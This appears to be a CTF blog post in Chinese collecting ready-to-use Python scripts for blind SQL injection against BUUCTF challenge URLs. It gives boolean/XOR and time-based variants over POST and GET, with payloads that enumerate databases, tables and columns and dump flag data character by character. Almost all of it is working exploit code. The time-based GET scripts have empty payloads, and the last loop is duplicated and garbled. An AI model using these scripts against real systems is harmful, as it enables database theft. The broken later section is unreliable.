1.通过post传参的脚本
用的时候修改post参数和个数
1.1 基于异或盲注,布尔盲注等:
import requests
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''
for i in range(1, 1000):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
#payload = f"1' or ascii(substr(database(),{i},1))>{mid}#" #查库
#payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#" #查表
#payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#" #查列
payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#" #查数据
data = {
"name":payload,
"pass":'qwer'
}
response = requests.post(url, data = data)
if 'u6216' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low != 32 :
flag += chr(int(low))
else:
break
print(flag)
12345678910111213141516171819202122232425262728291.2 基于时间盲注:
import requests
import time
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''
for i in range(1,1000):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
#payload = f"1' or if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)#" #查库名
#payload=f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#" #查表名
#payload=f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#" #查列名
#payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#" #查数据
data = {
"name":payload,
"pass":'qwer'
}
last = int(time.time())
response = requests.post(url, data = data)
now = int(time.time())
if now - last > 1 :
low = mid + 1
else :
high = mid
mid = (low + high) // 2
if low != 32 :
flag += chr(int(low))
else:
break
print(flag)
12345678910111213141516171819202122232425262728293031322.通过get传参的脚本
修改url 和 文本
2.1 基于异或盲注,布尔盲注等:
import requests
url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''
for i in range(1,1000):
min = 32
max = 128
while min<max:
mid = (min + max) // 2
payload=f"1^(ascii(substr(database(),{i},1))>{mid})#" #库名
#payload=f"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{i},1))>{mid})#" #查表名
#payload=f"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),{i},1))>{mid})#" #查列名#payload=f"1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})#"
#查数据
response=requests.get(url=url+payload)
if 'ERROR' in response.text:
min = mid + 1
else:
max=mid
if min != 32 :
name += chr(min)
else:
break
print(name)
1234567891011121314151617181920212223242.2 基于时间盲注:
import requests
import time
url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''
for i in range(1,1000):
min = 32
max = 128
while min<max:
mid = (min + max) // 2
payload=f" " #查库名
#payload=f" " #查表名
#payload=f" " #查列名
#payload=f" " #查数据
last = int(time.time())
response=requests.get(url=url+payload)
now = int(time.time())
if now - last > 1:
min = mid + 1
else:
max=mid
if min != 32 :
name += chr(min)
else:
break
print(name)for i in range(1,1000):
min = 32
max = 128
while min<max:
mid = (min + max) // 2
payload=f" " #查库名
#payload=f" " #查表名
#payload=f" " #查列名
#payload=f" " #查数据
last = int(time.time())
response=requests.get(url=url+payload)
now = int(time.time())
if now - last > 1:
min = mid + 1
else:
max=mid
if min != 32 :
name += chr(min)
else:
break
print(name)